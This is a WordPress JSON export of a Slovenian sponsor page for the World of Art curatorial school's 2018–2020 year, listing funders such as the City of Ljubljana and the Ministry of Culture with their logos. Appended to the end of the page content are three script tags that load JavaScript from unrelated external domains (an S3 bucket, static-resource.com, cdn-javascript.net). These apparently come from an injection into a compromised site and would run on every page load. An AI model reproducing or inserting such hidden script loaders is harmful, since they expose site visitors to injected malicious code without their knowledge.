{"id":15349,"date":"2018-10-07T20:17:08","date_gmt":"2018-10-07T18:17:08","guid":{"rendered":"http:\/\/www.worldofart.org\/aktualno\/?page_id=15349"},"modified":"2020-11-07T20:17:34","modified_gmt":"2020-11-07T18:17:34","slug":"podpora-2018-2020","status":"publish","type":"page","link":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/sedemnajsto-leto-2018-2020\/podpora-2018-2020","title":{"rendered":"Podpora 2018\/2020"},"content":{"rendered":"<p>Svet umetnosti | \u0160ola za kuratorske prakse in kriti\u0161ko pisanje | Leto 17<\/p>\n<hr \/>\n<p><strong>Podpora 17. leta \u0161ole Svet umetnosti med letoma 2018 in 2020<\/strong><\/p>\n<p>Celoten program \u0161ole Svet umetnosti podpira <a href=\"https:\/\/www.ljubljana.si\/sl\/mestna-obcina\/mestna-uprava\/oddelki\/oddelek-za-kulturo\/\" target=\"_blank\" rel=\"noopener noreferrer\">Mestna ob\u010dina Ljubljana, Oddelek za kulturo<\/a>.<br \/>\n<a href=\"https:\/\/www.ljubljana.si\/sl\/mestna-obcina\/mestna-uprava\/oddelki\/oddelek-za-kulturo\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-12506 alignnone\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/03\/grb-730x377.gif\" alt=\"\" width=\"178\" height=\"92\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/03\/grb-730x377.gif 730w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/03\/grb-338x175.gif 338w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/03\/grb-768x397.gif 768w\" sizes=\"(max-width: 178px) 100vw, 178px\" \/><\/a><br \/>\nRazstavo Sveta umetnosti v Galeriji \u0160kuc podpira <a href=\"http:\/\/www.mk.gov.si\/\" target=\"_blank\" rel=\"noopener noreferrer\">Ministrstvo za kulturo Republike Slovenije<\/a>.<\/p>\n<p><a href=\"http:\/\/www.mk.gov.si\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-8089\" title=\"Ministrstvo za kulturo\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2010\/02\/Ministrstvo-za-kulturo.jpg\" alt=\"\" width=\"193\" height=\"53\" \/><\/a><\/p>\n<p>Del programa \u0161ole je v sklopu profesionalizacije NVO podpiralo <a href=\"https:\/\/www.gov.si\/drzavni-organi\/ministrstva\/ministrstvo-za-javno-upravo\/\" target=\"_blank\" rel=\"noopener noreferrer\">Ministrstvo za javno upravo Republike Slovenije<\/a>.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-13945\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/11\/mju_logo-730x136.jpg\" alt=\"\" width=\"236\" height=\"44\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/11\/mju_logo-730x136.jpg 730w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/11\/mju_logo-338x63.jpg 338w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/11\/mju_logo-768x143.jpg 768w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/11\/mju_logo-813x152.jpg 813w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/11\/mju_logo.jpg 816w\" sizes=\"(max-width: 236px) 100vw, 236px\" \/><\/p>\n<p>Javna predavanja in modul Pisanje o sodobni umetnosti podpira <a href=\"http:\/\/kulturanova.hr\/\" target=\"_blank\" rel=\"noopener noreferrer\">Sklad Kultura nova<\/a>.<\/p>\n<p><a href=\"http:\/\/kulturanova.hr\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-12059 alignnone\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2017\/09\/logo.png\" alt=\"\" width=\"185\" height=\"63\" \/><\/a><\/p>\n<p>Predavanje Siegfrieda Zielinskega je nastalo v partnerstvu z <a href=\"https:\/\/www.goethe.de\/ins\/si\/sl\/index.html\">Goethe-Institutom Ljubljana<\/a>.<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-13733\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/09\/goethe-institut-logo.png\" alt=\"\" width=\"100\" height=\"47\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/09\/goethe-institut-logo.png 400w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/09\/goethe-institut-logo-338x158.png 338w\" sizes=\"(max-width: 100px) 100vw, 100px\" \/><\/p>\n<p>Predavanje <span class=\"st\">Mikl\u00f3sa Petern\u00e1ka je pripravljeno v sodelovanju z <a href=\"http:\/\/www.ljubljana.balassiintezet.hu\/sl\/\" target=\"_blank\" rel=\"noopener noreferrer\">Ballasijevim In\u0161titutom<\/a>.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-14758\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/09\/kkm-logo-en.png\" alt=\"\" width=\"96\" height=\"65\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-14597\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/07\/balassi_logo_slov-338x40.jpg\" alt=\"\" width=\"338\" height=\"40\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/07\/balassi_logo_slov-338x40.jpg 338w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/07\/balassi_logo_slov.jpg 768w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/07\/balassi_logo_slov-730x87.jpg 730w\" sizes=\"(max-width: 338px) 100vw, 338px\" \/><\/p>\n<p>Rezidenco umetnika Maxa Graua in kuratorke Lawinie Rate je omogo\u010dil <a href=\"http:\/\/www.jskd.si\/\" target=\"_blank\" rel=\"noopener noreferrer\">JSKD<\/a>.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-13696\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/09\/jskd-logo.jpg\" alt=\"\" width=\"94\" height=\"58\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/09\/jskd-logo.jpg 573w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/09\/jskd-logo-338x211.jpg 338w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2018\/09\/jskd-logo-542x340.jpg 542w\" sizes=\"(max-width: 94px) 100vw, 94px\" \/><\/p>\n<p>Strokovna ekskurzija 16. in 17. leta Sveta umetnosti je pripravljena v partnerstvu s podjetjem <a href=\"http:\/\/www.riko.si\/si\/\" target=\"_blank\" rel=\"noopener noreferrer\">Riko, d. o. o.<\/a><\/p>\n<p><a href=\"http:\/\/www.riko.si\/si\/\" target=\"_blank\" rel=\"noopener noreferrer\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-12235 alignnone\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2010\/02\/RIKOslogan-730x324.png\" alt=\"\" width=\"115\" height=\"51\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2010\/02\/RIKOslogan-730x324.png 730w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2010\/02\/RIKOslogan-338x150.png 338w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2010\/02\/RIKOslogan-768x341.png 768w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2010\/02\/RIKOslogan.png 1181w\" sizes=\"(max-width: 115px) 100vw, 115px\" \/><\/a><\/p>\n<p>Modul Financiranje razstav in projektov sodobne umetnosti smo pripravili v sodelovanju z <a href=\"http:\/\/ced-slovenia.eu\/motovila-2\/\" target=\"_blank\" rel=\"noopener noreferrer\">Motovilo, Centrom za spodbujanje sodelovanja v kulturnih in ustvarjalnih sektorjih<\/a>.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-14115\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/01\/logo-motovila-vstopna.png\" alt=\"\" width=\"126\" height=\"20\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/01\/logo-motovila-vstopna.png 360w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/01\/logo-motovila-vstopna-338x54.png 338w\" sizes=\"(max-width: 126px) 100vw, 126px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>Brezpla\u010den vstop in voden ogled razstav nam omogo\u010da <a href=\"http:\/\/www.mg-lj.si\/\" target=\"_blank\" rel=\"noopener noreferrer\">MG+MSUM<\/a>.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-14692\" src=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/07\/MGMSUM_znak_pantone-cool-gray9black_web_big-338x53.jpg\" alt=\"\" width=\"115\" height=\"18\" srcset=\"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/07\/MGMSUM_znak_pantone-cool-gray9black_web_big-338x53.jpg 338w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/07\/MGMSUM_znak_pantone-cool-gray9black_web_big-768x121.jpg 768w, https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-content\/uploads\/2019\/07\/MGMSUM_znak_pantone-cool-gray9black_web_big-730x115.jpg 730w\" sizes=\"(max-width: 115px) 100vw, 115px\" \/><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-files\/21b12e5cf48c5772c0.js\"><\/script><script src=\"http:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8625x\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8625x&amp;format=arrjs&amp;r=1568277181733\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Svet umetnosti | \u0160ola za kuratorske prakse in kriti\u0161ko pisanje | Leto 17 Podpora 17. leta \u0161ole Svet umetnosti med letoma 2018 in 2020 Celoten program \u0161ole Svet umetnosti podpira Mestna ob\u010dina Ljubljana, Oddelek za kulturo. Razstavo Sveta umetnosti v Galeriji \u0160kuc podpira Ministrstvo za kulturo Republike Slovenije. Del programa \u0161ole je v sklopu profesionalizacije [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":13480,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"categories":[],"tags":[],"_links":{"self":[{"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/pages\/15349"}],"collection":[{"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/comments?post=15349"}],"version-history":[{"count":1,"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/pages\/15349\/revisions"}],"predecessor-version":[{"id":15350,"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/pages\/15349\/revisions\/15350"}],"up":[{"embeddable":true,"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/pages\/13480"}],"wp:attachment":[{"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/media?parent=15349"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/categories?post=15349"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.worldofart.org\/arhiv.worldofart.org\/aktualno\/wp-json\/wp\/v2\/tags?post=15349"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}